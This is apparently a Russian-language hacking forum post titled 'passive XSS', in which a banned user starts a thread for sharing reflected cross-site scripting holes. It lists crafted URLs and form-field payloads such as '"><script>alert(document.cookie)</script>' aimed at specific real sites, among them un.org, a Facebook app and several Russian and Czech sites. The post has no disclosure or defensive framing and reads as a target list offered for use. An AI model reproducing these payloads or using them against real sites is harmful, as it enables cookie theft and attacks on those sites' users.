пассивные XSS

tickhack

BANNED
Messages
66
Reputation
1
Reaction score
12
Points
8
Please note, if you want to make a deal with this user, that it is blocked.
Выкладываем только пассивные XSS . Я начну :

Code:
http://mi.zaua.com/?rl=%22%3E%3Cscript%3Ealert(/Fuck%20off/)%3C/script%3E

Code:
http://www.un.org/zh/documents/view_doc.asp?url=javascript:alert(document.cookie)

Code:
http://www.dokoran.cz --> поле Hledani : "><script>alert('xss')</script>

Code:
http://uaportal.com/cgi_bin/add_url.cgi?lang=r&Theme_ID=53

В полях подставляем

"><script>alert(document.cookie)</script>


---------- Сообщение добавлено в 19:26 ---------- Предыдущее сообщение размещено в 19:22 ----------

Code:
http://apps.facebook.com/travelbuddies/place.php?placeid=8147%22%3E%3Cscript%3Ealert('xss By TickHack')%3C/script%3E

Code:
http://www.seolib.ru/script/contact/

Вставляем "><script>alert(/xss/)</script> в 

 name="email"
 name="message"
 name="name"

 ТиЦ 90
 
Top